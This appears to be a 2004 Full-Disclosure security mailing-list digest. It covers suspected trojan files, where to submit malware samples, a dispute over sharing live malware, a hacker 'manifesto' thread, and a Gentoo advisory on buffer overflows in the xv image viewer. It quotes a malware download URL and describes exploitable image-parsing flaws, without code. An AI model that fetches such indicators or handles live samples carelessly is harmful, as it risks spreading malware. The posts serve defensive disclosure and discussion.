iD8DBQFBOMMqzKC5hMHO6rkRAqmnAJ9LMGqjEBpUTQAXLNIFIDEH6TTR+ACfUCAh LjX87bbkNFchTqau42NZ4wo= =xWAL -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: win2kup2date.exe ?
Oh dear me! i thought something strange there can any one else see whats happening? ok fools how long do you think it can last ? stop engineering this list , all concerned remove yourself from this list immediatly to maintain list integrety! confused : ignore this message worried : be more so as its easier to wake people up than to sing them to sleep - and you are speeding up breakfast time dreamers : is there a real FD anywhere? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: win2kup2date.exe ?
Touché ! ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Where to submit a suspected trojan or virus?
> > I found an explorer.exe in my system32 folder > which I believe take > > precedence over the real explorer.exe located in > c:\windows. The fact that there's a copy of this Explorer.exe in System32 may be an issue. Was there an application running? Was there a Registry entry related to this file? If so, which one? How about another autostart location? What do you mean by "I believe take precedence over the real explorer.exe"? how so? There may be enough information associated with this file such that you may not need to submit it to anyone...there are things you can do to figure out what the file is... ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Where to submit a suspected trojan or virus?
On Fri, 03 Sep 2004 06:00:27 +0200, Scenobro <[EMAIL PROTECTED]> wrote: > I found an explorer.exe in my system32 folder which I believe take > precedence over the real explorer.exe located in c:\windows. > It's a 92K file that seems to be a visual basic program. Among the > strings contained in it there is a "C:\TestDL.exe" which I didn't find > on my disk and a url "http://www.getupdate.com/TestDownload.exe"; which > does't exists. (the home page of that site is a textfile containing only > "SB2"). > I sent the file to virustotal.com and they found nothing. > Where I can send this file for analysis? The Internet Storm Center also has a malware analysis group, and they coordinate with the major AV vendors; you can submit the file and relevant information at http://isc.sans.org/contact.php or via email to [EMAIL PROTECTED] (I think). -- Kyle Maxwell [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] The Hacker's Manifesto Reloaded
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 >.. >of intent, my manifesto, and it needs no >end user license agreement or copyright. It is not unreasonable, it is >not a declaration of war, it is a statement accompanying a point for >discussion, nothing more. >What do you think? I think you sucks. Hugo Vazquez Carapez (Fishface) Infohacking ev1l hax0rs (www.infohacking.com) Senior Security Consultant at iDEFENSE labs (www.iDEFENSE.com) -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.4 wkYEARECAAYFAkE4lNEACgkQPMMEGI9aoad9xQCfRoUUwxXfZU7Rvpd9l7EDyyl73nMA n0q48frHecpFJLi7tUEGPkVN4Y4w =E8hO -END PGP SIGNATURE- Concerned about your privacy? Follow this link to get secure FREE email: http://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger http://www.hushmail.com/services-messenger?l=434 Promote security and make money with the Hushmail Affiliate Program: http://www.hushmail.com/about-affiliate?l=427 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Where to submit a suspected trojan or virus?
Here's my list of vendor submission addresses, many of which initially came from Nick Fitzgerald. [EMAIL PROTECTED] avsubmit.symantec.com [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] Most of these want you to send it in a password protected zip file with a password 'infected'. Some of them want the password to be 'virus'. I tend to just send two zip files to everyone on my distribution list. If anyone knows of any others, I'd appreciate the info. -John > -Original Message- > From: Scenobro [mailto:[EMAIL PROTECTED] > Sent: Thursday, September 02, 2004 9:00 PM > To: [EMAIL PROTECTED] > Subject: [Full-Disclosure] Where to submit a suspected trojan > or virus? > > > I found an explorer.exe in my system32 folder which I believe take > precedence over the real explorer.exe located in c:\windows. > It's a 92K file that seems to be a visual basic program. Among the > strings contained in it there is a "C:\TestDL.exe" which I > didn't find > on my disk and a url > "http://www.getupdate.com/TestDownload.exe"; which > does't exists. (the home page of that site is a textfile > containing only > "SB2"). > I sent the file to virustotal.com and they found nothing. > Where I can send this file for analysis? > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Multi-vendor AV scanning without sending a sample
If you don't want to use something like www.virustotal.com to scan suspected malware, then use the activex web based scanners of several vendors. It's a bit more time consuming, but then you don't end up sending anyone your sample. Here's a list (a few actually do require you to upload the sample). If anyone knows of any others, please send me the info. AhnLab Inc. http://info.ahnlab.com/english/myv3/myv3.html Bit Defender http://www.bitdefender.com/scan/Msie/index.php ClamAV http://www.gietl.com/test-clamav/ Command AV(requires registration) http://www.commandondemand.com/ Computer Associates http://www3.ca.com/threatinfo/virusinfo/scan.aspx F-Secure http://support.f-secure.com/enu/home/ols.shtml Hauri http://www.globalhauri.com/html/onlineservice/livecall_service.html Kaspersky http://www.kaspersky.com/remoteviruschk.html McAfee http://www.mcafee.com/myapps/mfs/default.asp Panda http://www.pandasoftware.com/activescan/com/activescan_principal.htm RAV http://www.ravantivirus.com/scan/indexie.php Symantec (Scans entire system) http://security.symantec.com/default.asp?productid=symhome&langid=ie&ven id=sym Trend Micro http://housecall.trendmicro.com/housecall/start_corp.asp Regards, John ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Microsoft Update Loader msrtwd.exe
> When I first posted, I didnt have the EXE. When I > did receive a copy of the file, I was told I cannot > sent it outside of the network. > > Besides, Ive been on this list long enough to know > that questions like mine are asked from time to > time. If that's really the case, you should have known what the response would be. When you first posted, you seemed to have absolutely nothing to go on, even the file itself. As Nick and others have pointed out several times, filenames are next to useless. In your original post, you said, "It's listed in the Registry as "Microsoft Update Loader"", but you couldn't say *where* in the Registry it was listed as such. Are we then to assume that you were referring to the Run key? Which hive? Better yet, if you know that it's in the Registry, why not simply state which key it's located in? >From one of your responses in the thread: > "There were about 6 Registry enties in the HKLM > section. I dont have the compromised machine, so I > cannot tell you the exact locations. > > We ran TCPview on the compromised machine and > watched it connect to an IRC server. Okay, so you didn't *have* the compromised machine when I asked the question, but at one point you and someone else were sitting at the console of that system running TCPView, and at no point could anyone export the Registry entries to a text file or even simply write down the keys. Since you eventually were able to get the .exe file itself, did you run strings on it? Check it for file version info (some IRC bots, such as the russiantopz bot, simply use mIRC32.exe as it's core)? You said you've been on the list for a while, so I guess one question to ask you is, did you do *anything* besides post to the list? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] RES: Instant Messenger
I can't point you towards any white papers unfortunately, however I CAN point you towards an application that I have found most useful for securing IM conversations. http://www.secway.fr/products/simplite_msn/home.php The free version is for personal use and trial. Their pro version (only around $22 USD) will encrypt just about ANY mainstream IM you may use. Definately worth a look (for anyone) if you haven't seen it yet. Very easy to use and setup, which I find a necessity when trying to communicate with clients using it. (I can include the free version in an email or on a CD to them and give them instructions to install it.) -- Peace. ~G On Fri, 3 Sep 2004 11:42:31 -0300, Alexandre Cezar <[EMAIL PROTECTED]> wrote: > Take a look at http://www.akonix.com for securing IM communication and > I recommend this paper > www.giac.org/practical/GSEC/Frank_Reiss_GSEC.pdf > > Regards > -Mensagem original- > De: Ido Rosen [mailto:[EMAIL PROTECTED] > Enviada em: quinta-feira, 2 de setembro de 2004 23:17 > Para: Murtland, Jerry > Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]; > [EMAIL PROTECTED] > Assunto: Re: Instant Messenger > > Jabber. > > On Thu, 2 Sep 2004 10:00:18 -0400 > "Murtland, Jerry" <[EMAIL PROTECTED]> wrote: > > > I am looking for white papers on enterprise Instant Messenger security > > concerns. It doesn't have to be, but anything on MSN IM would be > > helpful too. Does anyone have any good resources to share? > > > > Jerry J. Murtland > > > > > > > > -- > +-+ > | Email : [EMAIL PROTECTED] / [EMAIL PROTECTED] | > | Jabber : [EMAIL PROTECTED] | > |PGP : http://www.dork.com/ido| > +-+ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] win2kup2date.exe ?
James Tucker to Harlan Carvey to me to : > > > > > ... If you want to email me a copy of it, I'll > > > > > rip it apart and see what can be seen. > > > > > > > > And world plus dog should entrust you with such > > > material because??? > > > ... most viruses, trojans and malware to not store > > > copies of stolen > > > data in their executables. Furthermore the file size > > > is very small. > > > > Interesting answer, but completely non-sequitor. Nick > > asked why this person should be trusted with a live > > bit of malware, and your response is that it's not > > very big??? What does that have to do with anything? > > Malware and viruses are VERY readily available in many places accross > the internet. Therefore this point should be of no concern. ... It feels good when you stop hitting your head aginst the door too, and there are very many doors readily available for you to hit your head against. Now, I don't know James, but I'd say it is a fair bet he doesn't hit his head against every door he sees just so he can enjoy the feeling when he stops hitting his head against each specific door. Look fool -- just because samples of some malware are easily accessible to you does not mean it is a good idea to encourage others to liberally spray copies of probably-new-and-undetected-by-many-scanners malware around willy nilly. Such encouragement is ethically dubious, at best... > ... The only > other concern which may be important is the possibility that the > binary is carrying data from the infected system; it was this that I > was refering to. Please accept my apology for not making this clearer. And that was all but irrelevant to my concerns. It is a possibility, and all the more reason to be sure that you really are sending your suspect files to a "true professional" but almost by definition, some arbitrary twit popping up in a mailing list or newsgroup saying "email me a copy of it, I'll rip it apart and see what can be seen" is _NOT_ such a person. (And, if you look at the website at the domain of his preferred address for recaiving "suspect" files, you have to question even further the suitability of this person...) > > > > P.S. Send it to [...] - it's my "catch all" for > > > > > virus/unknown files. Just be sure to ZIP it up > > > or else the web host > > > > > won't let it through. Otherwise I have disabled > > > all checks/scan. > > > > > Downloads directly to a secured Linux box. > > > > > > > > That's all very nice, but alone, far from the > > > makings of someone to > > > > entrust arbitrary, suspected malware samples to. > > > > > > "Entrust", just what exactly are you thinking you > > > might be giving away? > > > > Well, it's pretty obvious...a live bit of malware. > > It's really pretty obvious what Nick's getting > > at...why send this malware to some arbitrary person? > > Who's to say that he's going to use it as he says, and > > not send it back out to someone else? > > To what end? It would be much more useful to an attacker to go and > collect and customise one of the many readily available trojans on the > internet, rather than spreading malware which they have no control > over. IMHO your concern is closer to cynicism than practical reality. Without knowing what the malware in question was or the skills of the recipient (assuming, for a moment, that they may actually have had bad intentions), you cannot even begin to decide what is easier for them. Also, studying something that turned out to be entirely new may give someone with ill intent a better idea of how to beat the odds with their next release. But of course, that doesn't matter because the Internet is full of nasties so a few more makes no difference, eh James? Have you hit your head against that door just over to your right recently? A few really hard thwacks will be especially satisfying... <> > > > Samples of non-data carrying viruses or > > > trojans are of > > > little use to anyone other than Anti-Virus firms, as > > > it is easy to > > > collect raw source for most if one is so inclined. Malware source code is all but useless to the AV industry. It has to detect the actual code that ends up in actual malware which mostly means the binary output of compilation and linking. Having the source may help one work out a few wrinkles that the reverse engineering analysis did not resolve (usually because the time/effort/payoff estimates suggested it was not worthwhile). Such code is especially useful to the wannabe virus writer though, and almost never to professional AV researchers as, in the cases where source is released, it usually is not released until well after the AV'ers have anaylsed actual samples, added detection (and removal, etc) to their products and long since moved on. I guess your inability to comprehend this before writing the drivel above tells us even more about the value of your opinions about the desirability of sending arbitrary suspect cod
Re: [Full-Disclosure] [VirusTotal] Scan result (fwd)
> You know Vgrep (http://www.virusbtn.com/resources/vgrep/index.xml) ? No, I didn't. Thanks. =) You do bring up very valid points about the virus Db and such. Something many people may not be thinking of. Antivirus isn't my forte, although I do try to keep informed as it's part of my job. Appreciate the comments. -- Peace. ~G On Fri, 3 Sep 2004 11:31:27 +0200, Michel Messerschmidt <[EMAIL PROTECTED]> wrote: > On Thu, Sep 02, 2004 at 04:01:16PM -0400, Über GuidoZ wrote: > > It's kind of interesting to see the results, as it shows you what AV > > programs seem to detect things better then others. > > I think this is actually misleading. > You know nearly nothing from scanning just a single (or 10, 50,...) > sample. And there are other basic test requirements. For example: > - the different results could be due to differences in the update > schedule at virustotal.com (some vendors offer their fastest updates > only for premium licenses, which virustotal may not have). > - maybe some products are used with optimized settings (for example > maximum heuristic detection) and others with default settings. > > > It's also useful > > for known viruses, but needing to know what each AV program calls > > them. (I find this useful when trying to do tech support.) > > You know Vgrep (http://www.virusbtn.com/resources/vgrep/index.xml) ? > > -- > Michel Messerschmidt [EMAIL PROTECTED] > antiVirusTestCenter, Computer Science, University of Hamburg ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Empirical data surrounding guards and firewalls.
Yep, very true. Especially if some of them happen to be of the fairer sex, and happen to be missing a few buttons. (the buttons, is there an analogy to this in the 'Virtual World' ?) ;-) MN Vasquez wrote: Hrm. I think if enough people wearing only shirts and shoes ran into mcdonald's, at least some of the would get in, and not be blocked by the rule. - Original Message - From: "James Tucker" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Cc: <[EMAIL PROTECTED]> Sent: Thursday, September 02, 2004 3:15 PM Subject: Re: [Full-Disclosure] Empirical data surrounding guards and firewalls. Apologies, please explain the lack of differences, I'm not getting them. Virtual: "The door" - Port 80 - Closed after connection attempt. You come back, it does the same, and then closes again. 404 Error not being dissimilar to being told to get out. Real: Cops show up - As with the firewall, it does not actively stop you from reconnecting. McDonalds staff did not prevent you from re-entering the premesis themselves. Measures in Both: In the event of reconnection attempts the firewall logs would indicate an attack and external policing would have to deal with the problem. As far as I can see it the only difference is scaling, you can make many many millions of requests before a flood warning appears, whereas you only need to refuse to leave a few times before the police are called. I guess humans have less patience than computers. Of course I could be missing something? Oh yeah, I did miss something, you can't "disconnect" someone from being present in the building, as you can with a socket on a server. But with reconnection scaling, is that really relevant? A little, moreso in some circumstances, but not in this one. Why complain about anologies when your response contains anaolgies such as this one. Did you really go into McDonalds and harrass the staff today and get taken away by the police? Please say yes, that would make my day. ROFL :) On Thu, 2 Sep 2004 14:45:56 -0500 (CDT), [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: Target: -- -Firewall -McDonald's guard Materials: - -(1) Evol -(1) Shoes -(1) Shirt -(1) Computer -(1) Internet connection -(1) Firewalled host Procedure: - For each target, undergo the following steps: 1.) Enumerate an acceptable entrance policy. 2.) Attempt to enter while following entrance policy. Data: - Firewall: The firewall at internet host www.mcdonalds.com accepts connections to TCP/IP port 80. Rules are similar to 'DENY ALL EXCEPT TCP PORT 80' So make connection to port 80 and note results. Results: --- Normal transaction was accepted. See results: HTTP/1.1 400 Bad request Server: Netscape-Enterprise/4.1 Date: Thu, 02 Sep 2004 XX:XX:XX GMT Content-length: 147 Content-type: text/html Connection: close Store: - The store at the location closest to me was chosen as a specific target. The entrance policy is: 'IF (NOT SHOES) OR (NOT SHIRT) DENY' So, evol enters store with only shoes and a shirt. Data: Evol was rejected conduction of normal buisness. No Big Mac today, get out! Then, when Evol tries to proceed anyway, cops take Evol out of McDonalds. Conclusion: -- People and firewalls are different. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RES: Instant Messenger
Take a look at http://www.akonix.com for securing IM communication and I recommend this paper www.giac.org/practical/GSEC/Frank_Reiss_GSEC.pdf Regards -Mensagem original- De: Ido Rosen [mailto:[EMAIL PROTECTED] Enviada em: quinta-feira, 2 de setembro de 2004 23:17 Para: Murtland, Jerry Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Assunto: Re: Instant Messenger Jabber. On Thu, 2 Sep 2004 10:00:18 -0400 "Murtland, Jerry" <[EMAIL PROTECTED]> wrote: > I am looking for white papers on enterprise Instant Messenger security > concerns. It doesn't have to be, but anything on MSN IM would be > helpful too. Does anyone have any good resources to share? > > Jerry J. Murtland > > > -- +-+ | Email : [EMAIL PROTECTED] / [EMAIL PROTECTED] | | Jabber : [EMAIL PROTECTED] | |PGP : http://www.dork.com/ido| +-+ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Instant Messenger
Jabber. On Thu, 2 Sep 2004 10:00:18 -0400 "Murtland, Jerry" <[EMAIL PROTECTED]> wrote: > I am looking for white papers on enterprise Instant Messenger security > concerns. It doesn't have to be, but anything on MSN IM would be > helpful too. Does anyone have any good resources to share? > > Jerry J. Murtland > > > -- +-+ | Email : [EMAIL PROTECTED] / [EMAIL PROTECTED] | | Jabber : [EMAIL PROTECTED] | |PGP : http://www.dork.com/ido| +-+ pgpV0OlIc6Sqz.pgp Description: PGP signature
Re: [Full-Disclosure] The Hacker's Manifesto Reloaded
James, A nice manifesto indeed. But it no way does it correlates to the one which I have written (or probably modified). Maybe the sarcasm is not noticeable, maybe you missed it, maybe because we are different people altogether. Well, I am here because I am anti-authoritative, a negated personality (I hate to call it that because the fundamental idea of it's emergence was this growth of negative activity, this was root for pete's sake!). Maybe you supressed your impulses, or are vehementaly denying it. Well its snonymous to rap songs, they are violent, they are bad, but we listen, with that fetish look in eyes. Maybe you listen to it too or maybe not, but there always one vantage point where you blow your steam, about your very inner conscience. My conscience was the conscinence of this Manifesto, it manifests, the "hummm..." sound some people will do when they read it. It's for them. If not for them, lest it's for me. EULA might not cover it (how can you miss the pun there ?), but the First Amendment will. hehe. Am I spared? -Regards The Entrepreneur --- James Tucker <[EMAIL PROTECTED]> wrote: > A short piece of food for thought for all you > hackers out there. This > is not an attack on your livelihood this is merely a > point for your > consideration. > > It (the manifesto) does not explain why this > information is relevant > for me to read. or maybe I am unable to understand > the part that does, > if so please teach this willing student. > > Your manifesto seems largely similar to those > written by many others. > The attacks upon the security industry (which is > required, whether the > techs are good or not is a different matter) are > largely unqualified. > Please do not forget that businesses are formed due > to the needs of > other businesses or people and they serve others, > this leads in a > chain like manner back to the industries you would > choose not to > attack. > > Tell me how would you feel if you successfully stole > enough money that > you crashed an economy and power generation also > stopped. An unreal > scenario I know, but tone this back down to reality, > and you realise > that the things you are using are also directly > related to the things > you are trashing. In essence you are destroying your > own world. > > It is business that makes computers, it is power > that feeds the > factories, it is these peoples money that pays the > employees. The > employees need health insurance if they want to > survive, hospitals > need their equipment, which in turn requires design, > logistics for > movement of physical items. The logistics companies > need ISP's for > their communications infrastructure, and banks to > manage their money. > The trail goes on. Do you not realise that many of > the places you > attack are merely part of the chain of business > which supports the > world that you love? > > A final point to further this, how far are you > willing to go in > causing people inconvenience? Every day people > commit suicide due to > stress caused to them in their business lives. > Shutting down > communications media, or any other business could > have this effect (or > at least contribute). Even furthermore there are > situations where your > actions may more directly affect the safety of > individuals. Continuing > to do so may then be compared to attempted murder. > Still think you > have any moral high ground? > > Finally the word manifesto means "a declaration of > intent". I was > unable to see any intended actions stated. In fact > what I read more > resembled a boast of money gained by actions already > performed, and > insult of lesser hackers and security professionals. > For someone who > should have a clear understanding of the need for > accurate > understanding of language (most important when the > language is dealt > with on a purely logical and explicit basis as with > a computer system) > you seem to not care so much about the accuracy of > your written > language. > > --- > > I am a student of security and this is my manifesto. > I intend to have > any hacker who tries to attack me for trying to > provide an explanation > of my point of view to them, thrown into jail for > the longest sentence > available under the laws of the country in which > they committed their > crime. This is my statement of intent, my manifesto, > and it needs no > end user license agreement or copyright. It is not > unreasonable, it is > not a declaration of war, it is a statement > accompanying a point for > discussion, nothing more. > > What do you think? > > > On Fri, 3 Sep 2004 05:45:19 -0700 (PDT), the > entrepreneur > <[EMAIL PROTECTED]> wrote: > > it says everything. > > > > > > --- James Tucker <[EMAIL PROTECTED]> wrote: > > > > > why? > > > > > > On Fri, 3 Sep 2004 03:31:32 -0700 (PDT), the > > > entrepreneur > > > <[EMAIL PROTECTED]> wrote: > > > > The following was written shortly after my > > > > placement... > > > > > > > >\
Re: [Full-Disclosure] The Hacker's Manifesto Reloaded
A short piece of food for thought for all you hackers out there. This is not an attack on your livelihood this is merely a point for your consideration. It (the manifesto) does not explain why this information is relevant for me to read. or maybe I am unable to understand the part that does, if so please teach this willing student. Your manifesto seems largely similar to those written by many others. The attacks upon the security industry (which is required, whether the techs are good or not is a different matter) are largely unqualified. Please do not forget that businesses are formed due to the needs of other businesses or people and they serve others, this leads in a chain like manner back to the industries you would choose not to attack. Tell me how would you feel if you successfully stole enough money that you crashed an economy and power generation also stopped. An unreal scenario I know, but tone this back down to reality, and you realise that the things you are using are also directly related to the things you are trashing. In essence you are destroying your own world. It is business that makes computers, it is power that feeds the factories, it is these peoples money that pays the employees. The employees need health insurance if they want to survive, hospitals need their equipment, which in turn requires design, logistics for movement of physical items. The logistics companies need ISP's for their communications infrastructure, and banks to manage their money. The trail goes on. Do you not realise that many of the places you attack are merely part of the chain of business which supports the world that you love? A final point to further this, how far are you willing to go in causing people inconvenience? Every day people commit suicide due to stress caused to them in their business lives. Shutting down communications media, or any other business could have this effect (or at least contribute). Even furthermore there are situations where your actions may more directly affect the safety of individuals. Continuing to do so may then be compared to attempted murder. Still think you have any moral high ground? Finally the word manifesto means "a declaration of intent". I was unable to see any intended actions stated. In fact what I read more resembled a boast of money gained by actions already performed, and insult of lesser hackers and security professionals. For someone who should have a clear understanding of the need for accurate understanding of language (most important when the language is dealt with on a purely logical and explicit basis as with a computer system) you seem to not care so much about the accuracy of your written language. --- I am a student of security and this is my manifesto. I intend to have any hacker who tries to attack me for trying to provide an explanation of my point of view to them, thrown into jail for the longest sentence available under the laws of the country in which they committed their crime. This is my statement of intent, my manifesto, and it needs no end user license agreement or copyright. It is not unreasonable, it is not a declaration of war, it is a statement accompanying a point for discussion, nothing more. What do you think? On Fri, 3 Sep 2004 05:45:19 -0700 (PDT), the entrepreneur <[EMAIL PROTECTED]> wrote: > it says everything. > > > --- James Tucker <[EMAIL PROTECTED]> wrote: > > > why? > > > > On Fri, 3 Sep 2004 03:31:32 -0700 (PDT), the > > entrepreneur > > <[EMAIL PROTECTED]> wrote: > > > The following was written shortly after my > > > placement... > > > > > >\/\The Conscience of a > > Hacker - > > > Redux /\/ > > > (c)CopyRight > > SuppaDuppaSecurity > > > Solutions. > > > *where do u wanna pee > > today* > > > by > > > > > >+++The > > Entrepreneur+++ > > > > > > Written on September 3, > > > 2004. > > > > > > Another one got bought today, it's all over the > > Wall > > > Street. "Teenager Floated A Big Secuirty Company > > ", > > > "Hacker Paid After Ethical Hacking Of A Bank..." > > > Damn kids. They're all money whores. > > > > > > But did you, in your C Grade Economics Degree and > > > l4am3 technobrain, ever take a look behind the > > eyes of > > > > > > this professional hacker? Did you ever wonder > > what > > > made him whored, what forces lured him, what may > > have > > > sold him? > > > I am a professional hacker, look at my > > bank > > > account... > > > > > > Mine is a world that begins with money... I'm > > richer > > > than most of the other kids, this crap they buy is > > so > > > darn cheap... > > > Damn underachiever. They're all money > > whores. > > > > > > I'm a junior security consultant. I've listened > > to > > > senior security professionals about how to be a > > good > > > hacker. > > > I spit at it. "No, Mr.Ni
Re: [Full-Disclosure] [VirusTotal] Scan result (fwd)
Unless for (a purely theretical) example the website would use your submission to infect others Right, that is what I'm concern about. I do not know the intension of virustotal.com, and their policy on binaries they received. The parent site (http://www.hispasec.com/) does not offer more information. I believe the intension maybe good but I have some lingering suspicion of *free* service that have you send in binary maybe the elaborate works of vx traders. (cue the conspiracy theories) Me submitting the virus to someone count as distributing the virus (according to the lawyers). I been warn by lawyers about such things. I should add that the lawyers have no problem if I submit the sample to AV company. Its more of a CYA than anything else. J Michel Messerschmidt wrote: On Fri, Sep 03, 2004 at 10:43:50AM +0530, Aditya Deshmukh wrote: hey if the binary is infected and does not contain any hardcoded sencitive info what do u care about the owners of the website ? Unless for (a purely theretical) example the website would use your submission to infect others (perhaps with your address as sender) :-) Although the binary may not contain any sensitive data, it is dangerous in itself because it is self-replicating and thus hard to control once it is activated. If your are not very cautious when handling self-replicating code, you most likely end up sending it out to the world. So for the question how to handle possibly dangerous code it all comes down to "Who do you trust" ? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [VirusTotal] Scan result (fwd)
Michel Messerschmidt wrote: On Fri, Sep 03, 2004 at 10:43:50AM +0530, Aditya Deshmukh wrote: hey if the binary is infected and does not contain any hardcoded sencitive info what do u care about the owners of the website ? Unless for (a purely theretical) example the website would use your submission to infect others (perhaps with your address as sender) :-) Although the binary may not contain any sensitive data, it is dangerous in itself because it is self-replicating and thus hard to control once it is activated. If your are not very cautious when handling self-replicating code, you most likely end up sending it out to the world. So for the question how to handle possibly dangerous code it all comes down to "Who do you trust" ? Or, potentially, use the fact that you're infected with something against you. Like, say, holding a red flag up saying that you're backdoored. I have no evidence to suggest that that's what's going on -- just bringing it up as something someone can possibly gain from a submission of this type. -Barry ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Microsoft Update Loader msrtwd.exe
On Sep 3, Über GuidoZ ([EMAIL PROTECTED]) typed: UGZ: Easy sparky. Maybe it isn't his choice that he cannot release the EXE. UGZ: It's entirely possible, in fact, quite likely, that some "higher up" UGZ: who knows dick about IT and viruses got scared and said "This cannot UGZ: be shared with anyone! If it doesm you'll lose your job". Just because UGZ: they are worried about their image or that the file might contain UGZ: sensitive data. UGZ: UGZ: I have run into this situation MANY times. There is usually little you UGZ: can do about it as an IT staff member or a consultant. So the next UGZ: best thing - ask a group of people that might have a clue what's going UGZ: on, WITHOUT needing to see or analyze said file. UGZ: UGZ: Sheesh, give the guy a break. The only pollution I've noticed lately UGZ: is rude comments. Aye, Über is correct. When I first posted, I didnt have the EXE. When I did receive a copy of the file, I was told I cannot sent it outside of the network. Besides, Ive been on this list long enough to know that questions like mine are asked from time to time. On Thu, 2 Sep 2004 20:30:53 +0200 (CEST), A bitter Feher Tamas<[EMAIL PROTECTED]> wrote: > When the f*ck will people finally realize that it is NOT possible to say > anything about a file without actually having the file? > > If you wanna know what the f*ck this or that file is, go to and feed that > file here: > http://www.kaspersky.com/scanforvirus > > Less than 50 chars to remember and you can stop polluting this list. > Wow! > > Regards: Tamas Feher. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Empirical data surrounding guards and firewalls.
On Fri, 3 Sep 2004 15:22:15 +0200, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: > > You wrote: > > > .. > > Of course I could be missing something? > > .. > > 400 != 404 ? > > > /* Return code=1: generic error condition > Return code=2: all other error conditions */ > Put in my place, I feel very shamed, I misread the origonal. This does however re-maintain the fact that his anaolgy was in fact really quite a good one. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [OT] Re: [Full-Disclosure] Re: New paper on Security and Obscurity
Stormwalker wrote: <>Hi, It wasn't the general, massive military build up, but the specific program known as Star Wars under Ronald Raygun. The Soviets believed that the nonsense was true and tried to fund the research to catch up until they hit the wall. Unlike real military weapons, a fake weapon is controlled by the imagination, so there no limits to what was possible. cheers, bob Well, in all fairness, that wasn't the intent of the missile defense network. Many people considered it a very real "weapon" and we spent quite a bit of money on it as well. But, the rumors of a nasty super-weapon didn't hurt in sending the Soviet system down. Like I said, it's never just one thing. But ultimately, it's poor governing on the part of the Soviets that brought the Soviet Union down. -Barry <> ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [ GLSA 200409-07 ] xv: Buffer overflows in image handling
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200409-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: xv: Buffer overflows in image handling Date: September 03, 2004 Bugs: #61619 ID: 200409-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis xv contains multiple exploitable buffer overflows in the image handling code. Background == xv is a multi-format image manipulation utility. Affected packages = --- Package / Vulnerable / Unaffected --- 1 media-gfx/xv < 3.10a-r7 >= 3.10a-r7 Description === Multiple buffer overflow and integer handling vulnerabilities have been discovered in xv's image processing code. These vulnerabilities have been found in the xvbmp.c, xviris.c, xvpcx.c and xvpm.c source files. Impact == An attacker might be able to embed malicious code into an image, which would lead to the execution of arbitrary code under the privileges of the user viewing the image. Workaround == There is no known workaround at this time. Resolution == All xv users should upgrade to the latest stable version: # emerge sync # emerge -pv ">=media-gfx/xv-3.10a-r7" # emerge ">=media-gfx/xv-3.10a-r7" References == [ 1 ] BugTraq Advisory http://www.securityfocus.com/archive/1/372345/2004-08-15/2004-08-21/0 [ 2 ] CAN-2004-0802 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0802 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200409-07.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2004 